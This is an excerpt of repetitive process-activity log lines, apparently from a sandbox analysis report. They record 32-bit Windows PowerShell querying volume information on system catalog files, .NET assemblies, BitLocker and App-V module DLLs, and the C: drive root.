Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
